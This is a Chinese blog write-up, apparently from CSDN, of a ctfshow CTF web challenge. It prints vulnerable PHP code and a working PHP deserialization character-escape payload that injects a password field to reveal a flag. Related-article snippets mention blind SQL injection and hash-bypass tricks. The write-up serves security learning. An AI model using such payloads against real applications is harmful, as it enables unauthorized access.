ctfshow 月饼杯

最新推荐文章于 2023-01-05 22:56:22 发布
最新推荐文章于 2023-01-05 22:56:22 发布
阅读量353 收藏
点赞数
分类专栏: CTF题目 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45655564/article/details/120058503
版权
web1_此夜圆一个简单的反序列化逃逸<?phperror_reporting(0);class a{ public $uname; public $password; public function __construct($uname,$password) { $this->uname=$uname; $this->password=$password; } public function __wakeup() { if($this->pa
摘要由CSDN通过智能技术生成

web1_此夜圆

一个简单的反序列化逃逸

<?php
error_reporting(0);

class a
{
   
	public $uname;
	public $password;
	public function __construct($uname,$password)
	{
   
		$this->uname=$uname;
		$this->password=$password;
	}
	public function __wakeup()
	{
   
			if($this->password==='yu22x')
			{
   
				include('flag.php');
				echo $flag;	
			}
			else
			{
   
				echo 'wrong password';
			}
		}
	}

function filter($string){
   
    return str_replace('Firebasky','Firebaskyup',$string);
}

$uname=$_GET[1];
$password=1;
$ser=filter(serialize(new a($uname,$password)));
$test=unserialize($ser);
?>

这里是我们传进入$uname的值,这是我们唯一可控制的,目的是让password为yu22x
所以,就可以利用这个字符替换来逃逸

这里我们需要逃逸的是这样一个值

";s:8:"password";s:5:"yu22x";}

总共30个字符,然后每次替换就会多出2个字符,所以需要15个Firebasky来进行替换。
所以payload就是

FirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebasky";s:8:"password";s:5:"yu22x";}

web2_故人心

最低0.47元/天 解锁文章
Anfy1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow 月饼杯 re1_西北望乡】
chuxuezhewocao的博客
06-08 189
ctfshow 月饼
中秋月饼中秋月饼中秋月饼
01-30
中秋月饼
ctfshow_月饼
qq_44657899的博客
07-01 461
文章目录0x010x03 web3_莫负婵娟 (LIKE盲注、$PATH环境变量截取字母) 0x01 0x03 web3_莫负婵娟 (LIKE盲注、$PATH环境变量截取字母) 在登录页面的源代码中可以看到一些提示 用户名为yu22x,查询语句为like,可以使用通配符%和_。 百分比(%)通配符允许匹配任何字符串的零个或多个字符。下划线_通配符允许匹配任何单个字符。 fuzz了一下,被过滤的有这些字符,%号被过滤了,我们可以使用_ 写个脚本测试一下密码长度 import requests heade
ctfshow-月饼
LYJ20010728的博客
06-15 625
web1_此夜圆web1_此夜圆考点思路Payloadweb2_故人心考点思路Payloadweb3_莫负婵娟考点思路Payload web1_此夜圆 考点 php反序列化字符逃逸 思路 观察 index.php 代码,很容易发现是php反序列化字符逃逸中字符增多的考点,我们要将password的值变为yu22x,从而达到包含 flag.php 的目的,我们需要逃逸的部分为 ";s:8:"password";s:5:"yu22x";},长度为30,所以我们需要15个 Firebasky来达到逃逸这部分
ctfshow web 月饼
m0_62422842的博客
06-10 499
刷题知识总结:php反序列化字符逃逸。php浮点数绕过。hash爆破。file_get_contents读取任意文件。like盲注,脚本编写。通过环境变量截取字符。
月饼小游戏
10-26
在“吃月饼大赛”中,我们需要在canvas上绘制月饼以及玩家角色。使用JavaScript的`CanvasRenderingContext2D`对象可以实现这一目标,通过`fillRect()`或`drawImage()`方法来绘制月饼和角色。 接下来是事件监听。在...
月饼PPT插图素材
07-16
标题中的“月饼PPT插图素材”指的是一个专门设计用于制作与中秋节相关的PPT演示文稿的图形资源集合。这些插图通常包含各种与月饼和中秋节文化相关的元素,如月饼的图案、中秋月亮、兔子(月兔)、灯笼、团圆场景等,...
月饼销售方案月饼销售方案.doc
07-05
月饼销售方案】 本方案详述了一家公司在中秋期间针对月饼销售制定的策略,旨在提高销量,提升品牌形象,以及激发员工积极性。以下是方案的核心内容: 1. **产品介绍与定价**: - 提供四种不同价位的月饼礼盒,...
中秋节月饼礼盒模板
08-24
【标题】"中秋节月饼礼盒模板"所涉及的知识点主要集中在设计领域,特别是平面设计和包装设计方面。在设计行业中,模板通常是为了方便快速创建符合特定主题或节日的设计元素,节省时间和精力。中秋节是中国传统的重要...
ctfshow web篇月饼
读书 买花 长大
01-05 308
月饼
CTFSHOW 月饼杯 web
feng的博客
01-29 531
web1_此夜圆 <?php error_reporting(0); class a { public $uname; public $password; public function __construct($uname,$password) { $this->uname=$uname; $this->password=$password; } public function __wakeup()
CTFshow月饼杯(第二届) 中秋快乐 部分wp
Nancy523的博客
09-21 2374
苟,都可以苟 只要我osint做的够快我就不会被刷掉.jpg 体验很好,下次还来( 目录 1、web web签到 直接贴脚本吧,web不太懂不解释 <?php $str="0e"; for($i=1;$i<=10000000000;$i++){ $md5 = $str.$i; if (hash("md5",$md5)==$md5){ echo $md5; break; ..
ctfshow_2021月饼杯记录
MiGooli的博客
09-21 1693
一、WEB篇 作为队内的web手,差点连签到题都做不出来,属实是拉大胯丢大人了 web签到 <?php //Author:H3h3QAQ include "flag.php"; highlight_file(__FILE__); error_reporting(0); if (isset($_GET["YBB"])) { if (hash("md5", $_GET["YBB"]) == $_GET["YBB"]) { echo "小伙子不错嘛!!flag给你了:" . $fla
2021 ctfshow 月饼杯 pwn Moon_note
yongbaoii的博客
09-24 264
保护全开,没给libc。 没给libc真可谓。 菜单 create 设计的很有意思,申请的chunk实现了类似unsorted bin 的一个hash表。 chunk的结构是前16个字节是title,中间16个字节是链表,后八个字节是一会write的时候写内容的chunk地址。 write 就是申请一个chunk,写东西,地址放到上面create里面说的那个玩意里面。 但是只能写一次。 show 正常show delete free掉chunk,但是漏洞就在free掉那个wirte的chunk之后没有清.
ctfshow 2021 月饼杯 web
Sk1y的博客
09-23 548
文章目录web签到 web签到 <?php //Author:H3h3QAQ include "flag.php"; highlight_file(__FILE__); error_reporting(0); if (isset($_GET["YBB"])) { if (hash("md5", $_GET["YBB"]) == $_GET["YBB"]) { echo "小伙子不错嘛!!flag给你了:" . $flag; } else { echo "
ctfshow 月饼杯(第二届) 部分WriteUp
mumuzi的博客
09-21 2725
Misc 杂项签到 右键附件,从链接另存文件。然后用16进制编辑器或者你想用notepad也彳亍看文件尾,有一串base64,解码即可。 ctfshow{we1come_to_mooncake_cap} 有手就行 查看exif,有一串阿拉伯语,翻译过来是“你知道汉明码吗” 查看图片文件尾,发现一串数字 10110110111 然后随便找一篇看一下是怎么编码的,以及如何纠错的 https://blog.csdn.net/qq_19782019/article/details/87452394 例子他举的也
CTFshow月饼杯(第二届) 中秋快乐 套套去哪儿出题思路+解法
Nancy523的博客
09-21 1583
附件如上 题目名称:套套去哪儿 题目描述:套套在去一次旅游的路程中,在飞机上随手拍了这张照片,你能找出他在哪儿吗?(经过出题人的暴打,套套说这张照片是在2021年6月3号下午飞机航班“中途”拍的) 请找出套套在拍照时候飞机下方所在的城市市名+飞机航班号 例:ctfshow{厦门XB1145} Flag为:ctfshow{延安TV9817} WriteUp: 首先题目附件中给出的信息最直观的可以得到一串数字:B-6467 此处为考点1:飞机身上几种编号的代表含义...
ctfshow 月饼杯 crypto2_月自圆
m0_62506844的博客
01-16 2573
def encrypt(m, a, si): c="" for i in range(len(m)): c+=hex(((ord(m[i])) * a + ord(next(si))) % 128)[2:].zfill(2) return c if __name__ == "__main__": m = '****************************************************flag{*************}' assert(len(m)==71) .
月饼词云python
最新发布
09-16
月饼词云的制作涉及到Python中的数据分析和可视化技术。您可以使用Python的数据分析库(如pandas)和可视化库(如matplotlib或WordCloud)来处理和展示月饼的数据。您可以按照以下步骤进行操作: 1. 导入所需的库,如pandas、matplotlib和WordCloud。 2. 读取包含月饼数据的文件,并将其加载到一个pandas的DataFrame中。 3. 对数据进行必要的清洗和处理,例如去除重复项、空值或异常值。 4. 提取月饼的关键词信息,可以使用分词工具(如jieba)进行中文分词。 5. 统计每个关键词的出现频率,并将其转换为词云所需的格式。 6. 使用WordCloud库生成词云图,并设置合适的参数(如词云的大小、颜色、形状等)。 7. 展示生成的词云图。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值